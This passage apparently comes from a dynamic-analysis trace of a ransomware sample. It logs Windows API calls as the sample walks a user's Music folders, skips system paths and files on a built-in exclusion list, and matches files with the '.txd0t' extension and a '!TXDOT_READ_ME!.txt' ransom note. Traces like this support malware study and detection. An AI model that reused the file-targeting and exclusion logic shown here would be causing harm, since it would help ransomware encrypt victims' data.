(lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.571] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.571] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch=":\\boot\\") returned 0x0 [0129.571] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch=":\\perflogs\\") returned 0x0 [0129.571] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch=":\\programdata\\") returned 0x0 [0129.571] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch=":\\drivers\\") returned 0x0 [0129.571] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch=":\\wsus\\") returned 0x0 [0129.571] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.571] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.571] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="crypt_detect") returned 0x0 [0129.572] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="cryptolocker") returned 0x0 [0129.572] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="ransomware") returned 0x0 [0129.572] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="C:\\WINDOWS") returned 0x0 [0129.572] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.572] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="C:\\Program Files") returned 0x0 [0129.572] GetProcessHeap () returned 0xe30000 [0129.572] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4d6) returned 0xef3600 [0129.572] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-" [0129.572] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", psz2="\\*", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\*") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\*" [0129.572] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\*", lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x53f37ef0, ftCreationTime.dwHighDateTime=0x1d5e7f8, ftLastAccessTime.dwLowDateTime=0x51c0731b, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51c0731b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec19b0 [0129.572] StrCmpW (psz1=".", psz2=".") returned 0 [0129.572] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x53f37ef0, ftCreationTime.dwHighDateTime=0x1d5e7f8, ftLastAccessTime.dwLowDateTime=0x51c0731b, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51c0731b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.572] StrCmpW (psz1="..", psz2=".") returned 1 [0129.572] StrCmpW (psz1="..", psz2="..") returned 0 [0129.572] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51b94cac, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x51b94cac, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51bbadbb, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0129.572] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0129.572] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0129.572] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-" [0129.572] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", psz2="\\", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\" [0129.572] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\!TXDOT_READ_ME!.txt" [0129.572] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0129.572] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0129.572] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0129.572] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0129.572] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0129.572] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0129.572] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0129.572] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0129.572] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0129.572] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0129.573] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0129.573] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0129.573] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0129.573] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0129.573] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0129.573] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0129.573] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee4d8020, ftCreationTime.dwHighDateTime=0x1d5e764, ftLastAccessTime.dwLowDateTime=0xe32ee490, ftLastAccessTime.dwHighDateTime=0x1d5eb06, ftLastWriteTime.dwLowDateTime=0x51b94cac, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x2b3c, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="KXtDlQHWMbiCZ2hHs6x.m4a.txd0t", cAlternateFileName="KXTDLQ~1.TXD")) returned 1 [0129.573] StrCmpW (psz1="KXtDlQHWMbiCZ2hHs6x.m4a.txd0t", psz2=".") returned 1 [0129.573] StrCmpW (psz1="KXtDlQHWMbiCZ2hHs6x.m4a.txd0t", psz2="..") returned 1 [0129.573] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-" [0129.573] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", psz2="\\", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\" [0129.573] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\", psz2="KXtDlQHWMbiCZ2hHs6x.m4a.txd0t", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\KXtDlQHWMbiCZ2hHs6x.m4a.txd0t") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\KXtDlQHWMbiCZ2hHs6x.m4a.txd0t" [0129.573] PathFindExtensionW (pszPath="KXtDlQHWMbiCZ2hHs6x.m4a.txd0t") returned=".txd0t" [0129.573] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.573] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61010020, ftCreationTime.dwHighDateTime=0x1d5e6f1, ftLastAccessTime.dwLowDateTime=0x203b5a50, ftLastAccessTime.dwHighDateTime=0x1d5ef15, ftLastWriteTime.dwLowDateTime=0x51be116e, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7fd1, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="pEnlGp0QjdthKZA-Yo5o.mp3.txd0t", cAlternateFileName="PENLGP~1.TXD")) returned 1 [0129.573] StrCmpW (psz1="pEnlGp0QjdthKZA-Yo5o.mp3.txd0t", psz2=".") returned 1 [0129.573] StrCmpW (psz1="pEnlGp0QjdthKZA-Yo5o.mp3.txd0t", psz2="..") returned 1 [0129.573] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-" [0129.573] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", psz2="\\", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\" [0129.573] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\", psz2="pEnlGp0QjdthKZA-Yo5o.mp3.txd0t", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\pEnlGp0QjdthKZA-Yo5o.mp3.txd0t") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\pEnlGp0QjdthKZA-Yo5o.mp3.txd0t" [0129.573] PathFindExtensionW (pszPath="pEnlGp0QjdthKZA-Yo5o.mp3.txd0t") returned=".txd0t" [0129.573] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.573] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f2e37b0, ftCreationTime.dwHighDateTime=0x1d5ec02, ftLastAccessTime.dwLowDateTime=0xacd5dae0, ftLastAccessTime.dwHighDateTime=0x1d5e3c0, ftLastWriteTime.dwLowDateTime=0x51c0731b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x2cb0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="ZwNcr2UV.mp3.txd0t", cAlternateFileName="ZWNCR2~1.TXD")) returned 1 [0129.573] StrCmpW (psz1="ZwNcr2UV.mp3.txd0t", psz2=".") returned 1 [0129.573] StrCmpW (psz1="ZwNcr2UV.mp3.txd0t", psz2="..") returned 1 [0129.573] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-" [0129.573] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", psz2="\\", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\" [0129.573] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\", psz2="ZwNcr2UV.mp3.txd0t", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\ZwNcr2UV.mp3.txd0t") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\ZwNcr2UV.mp3.txd0t" [0129.573] PathFindExtensionW (pszPath="ZwNcr2UV.mp3.txd0t") returned=".txd0t" [0129.573] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.573] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f2e37b0, ftCreationTime.dwHighDateTime=0x1d5ec02, ftLastAccessTime.dwLowDateTime=0xacd5dae0, ftLastAccessTime.dwHighDateTime=0x1d5e3c0, ftLastWriteTime.dwLowDateTime=0x51c0731b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x2cb0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="ZwNcr2UV.mp3.txd0t", cAlternateFileName="ZWNCR2~1.TXD")) returned 0 [0129.573] FindClose (in: hFindFile=0xec19b0 | out: hFindFile=0xec19b0) returned 1 [0129.573] GetProcessHeap () returned 0xe30000 [0129.573] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xef3600 | out: hHeap=0xe30000) returned 1 [0129.574] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1082d280, ftCreationTime.dwHighDateTime=0x1d5e2d8, ftLastAccessTime.dwLowDateTime=0xc5bdf750, ftLastAccessTime.dwHighDateTime=0x1d5e2ca, ftLastWriteTime.dwLowDateTime=0x51c0731b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1089c, dwReserved0=0x741, dwReserved1=0x0, cFileName="Ph7y_8.m4a.txd0t", cAlternateFileName="PH7Y_8~1.TXD")) returned 1 [0129.574] StrCmpW (psz1="Ph7y_8.m4a.txd0t", psz2=".") returned 1 [0129.574] StrCmpW (psz1="Ph7y_8.m4a.txd0t", psz2="..") returned 1 [0129.574] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc" [0129.574] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", psz2="\\", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\" [0129.574] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\", psz2="Ph7y_8.m4a.txd0t", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Ph7y_8.m4a.txd0t") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Ph7y_8.m4a.txd0t" [0129.574] PathFindExtensionW (pszPath="Ph7y_8.m4a.txd0t") returned=".txd0t" [0129.574] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.574] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb523a730, ftCreationTime.dwHighDateTime=0x1d5e9b6, ftLastAccessTime.dwLowDateTime=0xe6d8b110, ftLastAccessTime.dwHighDateTime=0x1d5e1a2, ftLastWriteTime.dwLowDateTime=0x51c2d4bd, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7468, dwReserved0=0x741, dwReserved1=0x0, cFileName="Pq-yXja0.m4a.txd0t", cAlternateFileName="PQ-YXJ~1.TXD")) returned 1 [0129.574] StrCmpW (psz1="Pq-yXja0.m4a.txd0t", psz2=".") returned 1 [0129.574] StrCmpW (psz1="Pq-yXja0.m4a.txd0t", psz2="..") returned 1 [0129.574] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc" [0129.574] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", psz2="\\", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\" [0129.574] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\", psz2="Pq-yXja0.m4a.txd0t", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Pq-yXja0.m4a.txd0t") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Pq-yXja0.m4a.txd0t" [0129.574] PathFindExtensionW (pszPath="Pq-yXja0.m4a.txd0t") returned=".txd0t" [0129.574] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.574] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f9103d0, ftCreationTime.dwHighDateTime=0x1d5ed7e, ftLastAccessTime.dwLowDateTime=0x51d2c0b0, ftLastAccessTime.dwHighDateTime=0x1d5e98b, ftLastWriteTime.dwLowDateTime=0x51c5385c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x13397, dwReserved0=0x741, dwReserved1=0x0, cFileName="zaYdv7kbUlcUxSz3KeA-.wav.txd0t", cAlternateFileName="ZAYDV7~1.TXD")) returned 1 [0129.574] StrCmpW (psz1="zaYdv7kbUlcUxSz3KeA-.wav.txd0t", psz2=".") returned 1 [0129.574] StrCmpW (psz1="zaYdv7kbUlcUxSz3KeA-.wav.txd0t", psz2="..") returned 1 [0129.574] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc" [0129.574] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", psz2="\\", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\" [0129.574] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\", psz2="zaYdv7kbUlcUxSz3KeA-.wav.txd0t", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\zaYdv7kbUlcUxSz3KeA-.wav.txd0t") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\zaYdv7kbUlcUxSz3KeA-.wav.txd0t" [0129.574] PathFindExtensionW (pszPath="zaYdv7kbUlcUxSz3KeA-.wav.txd0t") returned=".txd0t" [0129.574] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.574] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f9103d0, ftCreationTime.dwHighDateTime=0x1d5ed7e, ftLastAccessTime.dwLowDateTime=0x51d2c0b0, ftLastAccessTime.dwHighDateTime=0x1d5e98b, ftLastWriteTime.dwLowDateTime=0x51c5385c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x13397, dwReserved0=0x741, dwReserved1=0x0, cFileName="zaYdv7kbUlcUxSz3KeA-.wav.txd0t", cAlternateFileName="ZAYDV7~1.TXD")) returned 0 [0129.574] FindClose (in: hFindFile=0xec23f0 | out: hFindFile=0xec23f0) returned 1 [0129.574] GetProcessHeap () returned 0xe30000 [0129.574] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed90d0 | out: hHeap=0xe30000) returned 1 [0129.574] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd178d9f0, ftCreationTime.dwHighDateTime=0x1d5ea4c, ftLastAccessTime.dwLowDateTime=0xf27b55d0, ftLastAccessTime.dwHighDateTime=0x1d5e0d6, ftLastWriteTime.dwLowDateTime=0x51c79a1b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x8da5, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="fXQDJP18MMdWjvedkW4.mp3.txd0t", cAlternateFileName="FXQDJP~1.TXD")) returned 1 [0129.574] StrCmpW (psz1="fXQDJP18MMdWjvedkW4.mp3.txd0t", psz2=".") returned 1 [0129.574] StrCmpW (psz1="fXQDJP18MMdWjvedkW4.mp3.txd0t", psz2="..") returned 1 [0129.574] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Music", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music") returned="C:\\Users\\FD1HVy\\Music" [0129.574] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music", psz2="\\", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\") returned="C:\\Users\\FD1HVy\\Music\\" [0129.575] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\", psz2="fXQDJP18MMdWjvedkW4.mp3.txd0t", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\fXQDJP18MMdWjvedkW4.mp3.txd0t") returned="C:\\Users\\FD1HVy\\Music\\fXQDJP18MMdWjvedkW4.mp3.txd0t" [0129.575] PathFindExtensionW (pszPath="fXQDJP18MMdWjvedkW4.mp3.txd0t") returned=".txd0t" [0129.575] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.575] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa0c2db0, ftCreationTime.dwHighDateTime=0x1d5ef72, ftLastAccessTime.dwLowDateTime=0x51ca166c, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51ca166c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="JI_ROcYP5iaMyIhA11bQ", cAlternateFileName="JI_ROC~1")) returned 1 [0129.575] StrCmpW (psz1="JI_ROcYP5iaMyIhA11bQ", psz2=".") returned 1 [0129.575] StrCmpW (psz1="JI_ROcYP5iaMyIhA11bQ", psz2="..") returned 1 [0129.575] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Music", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music") returned="C:\\Users\\FD1HVy\\Music" [0129.575] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music", psz2="\\", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\") returned="C:\\Users\\FD1HVy\\Music\\" [0129.575] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\", psz2="JI_ROcYP5iaMyIhA11bQ", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ") returned="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ" [0129.575] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="\\windows\\system32\\") returned 0x0 [0129.575] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.575] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="\\windows\\system\\") returned 0x0 [0129.575] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.575] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.575] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="\\appdata\\local\\") returned 0x0 [0129.575] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.575] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.575] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.575] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch=":\\boot\\") returned 0x0 [0129.575] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch=":\\perflogs\\") returned 0x0 [0129.575] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch=":\\programdata\\") returned 0x0 [0129.575] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch=":\\drivers\\") returned 0x0 [0129.575] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch=":\\wsus\\") returned 0x0 [0129.575] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.575] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.575] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="crypt_detect") returned 0x0 [0129.575] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="cryptolocker") returned 0x0 [0129.575] StrStrIW 